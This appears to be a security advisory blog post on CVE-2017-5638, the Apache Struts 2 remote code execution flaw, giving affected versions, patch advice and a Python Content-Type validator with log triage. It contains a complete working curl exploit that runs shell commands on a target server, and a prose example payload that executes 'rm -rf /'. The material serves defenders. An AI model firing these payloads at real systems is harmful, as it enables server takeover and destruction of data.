Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)


The CVE-2017-5638 vulnerability in Apache Struts 2 stems from flawed error handling within the Jakarta Multipart parser. When a malicious `Content-Type` header is sent with a file upload request, the framework mishandles it: if the header contains an OGNL (Object-Graph Navigation Language) expression wrapped in `%{` and `}`, the parser evaluates that expression while generating its error message. The evaluation happens because the exception message, which embeds the raw header value, is incorporated into the broader error response without sanitization. Since OGNL expressions can execute arbitrary Java code on the server, an attacker can craft a request with a `Content-Type` value such as `%{(_='multipart/form-data').(_memberAccess['allowStaticMethodAccess']=true).(@java.lang.Runtime@getRuntime().exec('rm -rf /'))}`. This bypasses the framework's security controls and gives the attacker remote code execution with the privileges of the Struts application server, fundamentally compromising the host.
Platform: Apache Struts 2

Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10

Vulnerability: Remote Code Execution

Severity: Critical

Date: 2017-03-07

Prediction: 2017-03-10

What Undercode Says:

`curl -H "Content-Type: %{(_='multipart/form-data').([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context['com.opensymphony.xwork2.ActionContext.container']).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd='id').(iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(cmds=(iswin?{'cmd.exe','/c',cmd}:{'/bin/bash','-c',cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}" http://target/upload.action`

How to Exploit:

Craft a malicious `Content-Type` header containing an OGNL expression to achieve RCE.

Protection from this CVE:

Upgrade to Struts 2.3.32 or 2.5.10.1. Where an immediate upgrade is not possible, implement WAF rules that reject requests whose `Content-Type` header carries OGNL expression syntax.
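The check behind such a WAF or filter rule is small: a legitimate `Content-Type` for a file upload is `multipart/form-data` with at most a boundary and a charset parameter, and it never contains the `%{`, `${`, `#` or `@` characters that OGNL expressions rely on (the marker pair described in the summary above). The following Python is an added example, not code from the original post or from the Struts project: it validates a header value against that shape and runs the same verdict over a few constructed access-log lines so a defender can triage which requests carried the pattern. The log format, IP addresses and `classify_content_type`/`triage_log` names are assumptions made for the example.

```python
"""Content-Type validation and log triage for the CVE-2017-5638 pattern.

Constructed example (not from the advisory or from Apache Struts). It mirrors
the "validate Content-Type in a servlet filter / WAF" mitigation: accept only a
well-formed multipart/form-data header and flag anything carrying OGNL syntax.
"""
import re

# Characters that appear in OGNL expressions but never in a valid Content-Type
# (RFC 2046 boundary characters exclude all of them).
OGNL_MARKERS = ("%{", "${", "#", "@")

# Strict multipart/form-data: media type, optional boundary (RFC 2046 bchars,
# optionally quoted), optional charset, nothing else.
MULTIPART_RE = re.compile(
    r"^multipart/form-data"
    r"(?:\s*;\s*boundary=\"?[A-Za-z0-9'()+_,./:=? -]{1,70}\"?)?"
    r"(?:\s*;\s*charset=[A-Za-z0-9_-]+)?\s*$",
    re.IGNORECASE,
)


def classify_content_type(value):
    """Return 'ok', 'reject-ognl' or 'reject-malformed' for one header value.

    A request with no Content-Type never reaches the multipart parser, so it
    is treated as 'ok'. Any OGNL marker is rejected outright; a header that
    mentions multipart/form-data but is not well-formed is rejected too,
    because that is exactly the input the vulnerable error path echoes back.
    """
    if value is None:
        return "ok"
    if any(marker in value for marker in OGNL_MARKERS):
        return "reject-ognl"
    if "multipart/form-data" in value.lower() and not MULTIPART_RE.match(value):
        return "reject-malformed"
    return "ok"


# Constructed log format (assumption): timestamp, client IP, method, path,
# then the request's Content-Type quoted as ct="...".
LOG_LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) ct="([^"]*)"$')

# Constructed sample log lines; the third carries a harmless OGNL expression
# shaped like the S2-045 pattern, the fourth is a malformed multipart header.
SAMPLE_LOG = """\
2017-03-08T10:01:22Z 198.51.100.4 POST /upload.action ct="multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxk"
2017-03-08T10:01:23Z 198.51.100.4 POST /api/items ct="application/json; charset=utf-8"
2017-03-08T10:02:05Z 203.0.113.9 POST /upload.action ct="%{(_='multipart/form-data').(1+1)}"
2017-03-08T10:02:06Z 203.0.113.9 POST /upload.action ct="multipart/form-data;;"
"""


def triage_log(text):
    """Return (client_ip, path, verdict) for every line that is not 'ok'."""
    findings = []
    for line in text.splitlines():
        match = LOG_LINE_RE.match(line)
        if not match:
            continue  # unparseable line: skip rather than guess
        _ts, client_ip, _method, path, content_type = match.groups()
        verdict = classify_content_type(content_type)
        if verdict != "ok":
            findings.append((client_ip, path, verdict))
    return findings


if __name__ == "__main__":
    for client_ip, path, verdict in triage_log(SAMPLE_LOG):
        print(f"{client_ip} {path} -> {verdict}")
```

The two reject verdicts are kept separate on purpose: `reject-ognl` is a high-confidence hit worth an alert, while `reject-malformed` catches probing with broken multipart headers and is better routed to a lower-severity queue, since a buggy client can also produce it.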

Impact:

Full server compromise. Arbitrary command execution.


Sources:

Reported by: nvd.nist.gov

Extra source hub: Undercode
